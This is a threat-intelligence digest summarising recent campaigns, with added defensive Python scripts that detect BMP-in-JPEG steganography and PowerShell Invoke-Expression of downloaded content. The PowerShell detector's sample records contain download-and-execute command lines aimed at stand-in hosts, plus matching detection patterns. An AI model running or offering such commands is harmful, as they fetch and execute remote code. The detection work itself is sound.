Citrix NetScaler flaw exploited as zero-day in attacks against Netherlands-based organizations
The Dutch National Cyber Security Centre (NCSC) has warned that since at least early May 2025, a Citrix NetScaler vulnerability, tracked as CVE-2025-6543, has been exploited as a zero-day to breach ‘critical organizations’ within the country. While the flaw was initially thought to be exploited only in a series of denial-of-service attacks, the NCSC now indicates that the attackers exploited it to achieve remote code execution. The attacks were initiated by one or more sophisticated actors, who actively removed all traces of activity after compromise to eliminate evidence of the intrusion. Although impacted organizations have not been named, the Openbaar Ministerie disclosed a breach on July 18th, 2025, stating that the attack was discovered after receiving an NCSC alert. The attack caused severe operational disruption, with the organization only starting to bring some of its systems back online around August 4th, 2025. Patches for the flaw are available.
UK Home Office impersonated in phishing campaign targeting visa sponsor license holders
Mimecast researchers discovered an ongoing phishing campaign targeting UK organizations holding sponsor licenses, with a specific focus on those actively managing visa sponsorship programs and using the Sponsorship Management System (SMS). The aim of the campaign is to steal SMS portal login credentials, enabling financial exploitation, fraudulent immigration activity, and identity theft. The attackers send emails impersonating the UK Home Office that cite urgent compliance or suspension warnings. The emails contain a link to a CAPTCHA-gated URL, which redirects users to a phishing page cloned from the official SMS portal; the credentials entered there grant the attackers full sponsor functionality. Compromised accounts are typically sold on dark web forums for financial gain or used directly for immigration fraud, while some accounts may also be used for extortion against the targeted organization.
TA558-linked campaign uses steganography to deliver PureLogs and Remcos malware
Between July and August 2025, ShadowOpCode researchers observed a malspam campaign targeting Italian-speaking individuals. The campaign used invoice-themed phishing emails containing an XLS document designed to exploit CVE-2017-11882, which initiated a multi-stage dropper execution chain. The campaign also used BMP-in-JPG steganography to conceal the .NET payloads, which ultimately led to the execution of Remcos or PureLogs malware stored in a DLL file. Based on Italian and French variable names in the loader and Portuguese terms inside a DLL, the campaign aligns with patterns previously linked to TA558’s SteganoAmor campaign. The researchers assess with moderate-high confidence that the overlaps in techniques, language choices, and staging logic strongly suggest TA558, or an actor using the same toolset, is behind the campaign. The campaign’s infrastructure, including the use of DuckDNS, ngrok, and more, also aligns with previously reported TA558 clusters.
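The BMP-in-JPG staging described above can be triaged on the defender side with a structural check: a well-formed JPEG ends at its EOI marker, so any bytes after it are worth inspecting, and a BMP file header in that trailing region is a strong indicator of a hidden payload. The following Python script is an added example, not code from the ShadowOpCode report or from the campaign; the sample JPEG and BMP bytes are constructed inline.

```python
"""Triage check for JPEG files carrying a hidden BMP after the EOI marker.

Added example with constructed sample data; it does not reproduce the
campaign's loader, only the container check a defender would run on
suspicious image files pulled from mail or proxy logs.
"""
import struct

JPEG_SOI = b"\xff\xd8"
JPEG_EOI = b"\xff\xd9"


def find_jpeg_eoi(data: bytes) -> int:
    """Return the offset just past the EOI marker of the JPEG in data, or -1.

    Marker segments are walked until SOS; entropy-coded data after SOS can
    never contain FF D9, so scanning for it from there is safe.
    """
    if not data.startswith(JPEG_SOI):
        return -1
    pos, n = 2, len(data)
    while pos + 4 <= n:
        if data[pos] != 0xFF:
            return -1
        marker = data[pos + 1]
        if marker == 0xD9:
            return pos + 2
        if marker == 0xD8 or 0xD0 <= marker <= 0xD7:  # SOI / RSTn carry no length
            pos += 2
            continue
        seg_len = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        if marker == 0xDA:  # SOS: skip its header, then look for EOI
            idx = data.find(JPEG_EOI, pos + 2 + seg_len)
            return -1 if idx < 0 else idx + 2
        pos += 2 + seg_len
    return -1


def looks_like_bmp(blob: bytes) -> bool:
    """Check the 14-byte BMP file header: 'BM' magic, plausible size and pixel offset."""
    if len(blob) < 14 or blob[:2] != b"BM":
        return False
    size, _r1, _r2, offset = struct.unpack("<IHHI", blob[2:14])
    return 14 <= offset <= size <= len(blob)


def analyze(data: bytes) -> dict:
    """Report how many bytes follow the JPEG EOI and whether they form a BMP."""
    end = find_jpeg_eoi(data)
    trailing = b"" if end < 0 else data[end:]
    return {"trailing_bytes": len(trailing), "bmp_payload": looks_like_bmp(trailing)}


def build_sample() -> tuple:
    """Construct a minimal JPEG and a minimal 1x1 24-bit BMP for the demo."""
    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    jpeg = (JPEG_SOI + b"\xff\xe0" + struct.pack(">H", len(app0) + 2) + app0
            + b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
            + b"\x12\x34\x56\x78" + JPEG_EOI)
    pixels = b"\x00\x00\xff\x00"  # one BGR pixel plus row padding
    dib = struct.pack("<IiiHHIIiiII", 40, 1, 1, 1, 24, 0, len(pixels), 2835, 2835, 0, 0)
    bmp = (b"BM" + struct.pack("<IHHI", 14 + len(dib) + len(pixels), 0, 0, 14 + len(dib))
           + dib + pixels)
    return jpeg, bmp


SAMPLE_JPEG, SAMPLE_BMP = build_sample()

if __name__ == "__main__":
    print("clean image:  ", analyze(SAMPLE_JPEG))
    print("image + BMP:  ", analyze(SAMPLE_JPEG + SAMPLE_BMP))
    print("image + junk: ", analyze(SAMPLE_JPEG + b"hello"))
```

The check is deliberately conservative: trailing bytes alone are common (EXIF editors and some cameras leave them), so the BMP header test is what separates a steganographic carrier from ordinary slack. A heavier inspection would parse the DIB header and compare the declared pixel dimensions against the JPEG's own frame size.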
Pakistan-based network leverages SEO poisoning to distribute infostealers
CloudSEK researchers uncovered a Pakistan-based infostealer distribution network leveraging search engine optimization (SEO) poisoning and abusing legitimate online forums and platforms to financially benefit from pay-per-install (PPI) schemes. The network, which has operated since 2020, creates posts for high-demand cracked software to lure victims to a series of malicious WordPress sites that deliver infostealer malware, notably Lumma Stealer, Meta Stealer, and Atomic macOS Stealer, via password-protected archives. The threat actors manage their own PPI networks, using SpaxMedia and InstallBank to pay themselves and their affiliates after successful malware installations. To date, a total of 5,239 network affiliates have operated 3,883 sites to generate over 449 million clicks and over 1.88 million installations of infostealers within the documented period. Over the course of the campaign, the network has generated over $4.67 million in revenue.
PS1Bot leverages PowerShell commands for keylogging, data theft, persistence, and more
Throughout 2025, Cisco Talos researchers observed an ongoing campaign leveraging malvertising to infect victims with a multi-stage malware framework, dubbed PS1Bot, that is implemented in PowerShell and C#. PS1Bot features a modular design, delivering several modules to perform keylogging, information theft, and reconnaissance, and to establish persistence. Its modules are delivered in-memory to evade detection. The malware is spread via a compressed archive containing a JavaScript file that acts as a downloader. Once executed, the script performs the required environment setup, including writing a PowerShell script that attempts to establish a C2 connection. Any further received content is passed to Invoke-Expression and executed within the PowerShell process, enabling credential, session token, and financial data theft. The campaign has been highly active, with new samples continuously observed over the past months. PS1Bot features similarities to the design and implementation of the AHK Bot malware family. Activity associated with the campaign also displays overlaps with previous reporting on Skitnet.
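The behaviour that makes PS1Bot's loader detectable is the one the summary names: content fetched from a remote host is handed straight to Invoke-Expression. With PowerShell script block logging enabled, that pattern shows up in the logged script text even when the modules themselves never touch disk. The Python below is an added example, not Talos detection content or PS1Bot code; the log records are constructed to imitate Event ID 4104 script block text, and the rule names (`iex-of-download`, `iex-of-tainted-variable`) are this example's own.

```python
"""Flag PowerShell script blocks that execute downloaded content via Invoke-Expression.

Added example with constructed records imitating script block logging output;
no line below comes from a real incident or from the PS1Bot samples.
"""
import re

# Constructed (record_id, script_text) pairs standing in for logged script blocks.
SAMPLE_BLOCKS = [
    (1, "Get-ChildItem C:\\Users | Sort-Object LastWriteTime"),
    (2, "$c = New-Object Net.WebClient; IEX $c.DownloadString('http://example.invalid/stage')"),
    (3, "Invoke-Expression (Invoke-RestMethod -Uri 'http://example.invalid/c2')"),
    (4, "$r = Invoke-WebRequest 'https://example.invalid/report'; $r.Content | Out-File report.html"),
    (5, "$s = (New-Object Net.WebClient).DownloadString($u); iex $s"),
]

# Download primitives commonly seen feeding Invoke-Expression.
DOWNLOAD = re.compile(
    r"\b(Net\.WebClient|DownloadString|DownloadData|Invoke-WebRequest|iwr|"
    r"Invoke-RestMethod|irm)\b", re.IGNORECASE)
IEX = re.compile(r"\b(Invoke-Expression|iex)\b", re.IGNORECASE)
ASSIGN = re.compile(r"^\s*\$(\w+)\s*=")


def flag_block(script: str) -> list:
    """Return the reasons a script block is suspicious (empty list if none).

    Two cases are covered: the download call appears in the same statement as
    Invoke-Expression, or the download result is stored in a variable that a
    later statement passes to Invoke-Expression.
    """
    reasons = []
    tainted = set()  # variable names assigned from a download call
    for stmt in re.split(r"[;\n]", script):
        m = ASSIGN.match(stmt)
        if m and DOWNLOAD.search(stmt):
            tainted.add(m.group(1).lower())
        if not IEX.search(stmt):
            continue
        if DOWNLOAD.search(stmt):
            reasons.append("iex-of-download")
        elif any(re.search(r"\$" + re.escape(v) + r"\b", stmt, re.IGNORECASE)
                 for v in tainted):
            reasons.append("iex-of-tainted-variable")
    return reasons


def scan(records) -> list:
    """Run flag_block over (id, text) records; return only the flagged ones."""
    hits = []
    for rid, text in records:
        reasons = flag_block(text)
        if reasons:
            hits.append((rid, reasons))
    return hits


if __name__ == "__main__":
    for rid, reasons in scan(SAMPLE_BLOCKS):
        print(f"record {rid}: {', '.join(reasons)}")
```

Record 4 downloads a page but writes it to a file rather than executing it, so it is not flagged; that distinction keeps the rule usable on hosts where administrators legitimately use Invoke-WebRequest. The variable-taint pass is what catches the two-step form in record 5, which a single-regex rule looking for `IEX (New-Object ...)` would miss.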
Ransomware
Crypto24 Ransomware Group Blends Legitimate Tools with Custom Malware for Stealth Attacks – Trend Micro Research News Perspectives – Aug 14 2025
Croatian research institute confirms ransomware attack via ToolShell vulnerabilities – Help Net Security – Aug 13 2025
US Authorities Seize $1m from BlackSuit Ransomware Group – Infosecurity Today – Aug 13 2025
New Ransomware Charon Uses Earth Baxia APT Techniques to Target Enterprises – Trend Micro Research News Perspectives – Aug 12 2025
Researchers cracked the encryption used by DarkBit ransomware – Security Affairs – Aug 12 2025
MedusaLocker ransomware group is looking for pentesters – Security Affairs – Aug 11 2025
Unmasking Embargo Ransomware: A Deep Dive Into the Group’s TTPs and BlackCat Links – TRM Labs – Aug 08 2025
Financial Services
Fictitious Law Firms Targeting Cryptocurrency Scam Victims Combine Multiple Exploitation Tactics While Offering to Recover Funds – Internet Crime Complaint Center – Aug 13 2025
Hackers leak Allianz Life data stolen in Salesforce attacks – Bleeping Computer – Aug 12 2025
Scammers mass-mailing the Efimer Trojan to steal crypto – Kaspersky Lab – Aug 08 2025
GreedyBear Steals $1M in Crypto Using 150+ Malicious Firefox Wallet Extensions – The Hacker News – Aug 08 2025
GitLab uncovers Bittensor theft campaign via PyPI – GitLab – Blog – Aug 06 2025
Geopolitics
‘Curly COMrades’ APT Hackers Target Critical Organizations Across Multiple Countries – GBHackers On Security – Aug 13 2025
Hacker Alleges Russian Government Role in Kaseya Cyber-Attack – Infosecurity Today – Aug 12 2025
Researchers detail new ‘gray zone conflict’ in AI-driven Chinese propaganda – Nextgov – All Content – Aug 11 2025
From ClickFix to Command: A Full PowerShell Attack Chain – Fortinet – Aug 11 2025
‘A million calls an hour’: Israel relying on Microsoft cloud for expansive surveillance of Palestinians – The Guardian – Aug 06 2025
High Priority Vulnerabilities
Name | Software | Base Score | Temp Score | Related
---|---|---|---|---
CVE-2025-8088 | WinRAR | 8.8 | 6.3 | WinRAR flaw exploited as zero-day by RomCom group and Paper Werewolf
CVE-2025-53786 | Exchange Server | 8.0 | 6.3 | CISA issues emergency directive for Microsoft Exchange flaw
CVE-2025-53779 | Windows | 7.2 | 6.7 | Microsoft August 2025 Patch Tuesday fixes one zero-day, 107 flaws
CVE-2025-32433 | OTP | 10.0 | 9.4 | Maximum-severity Erlang/OTP flaw exploited to deliver malicious payloads
CVE-2024-40766 | SonicOS | 9.8 | 7.0 | SonicWall confirms SSL VPN exploitation not connected to zero-day flaw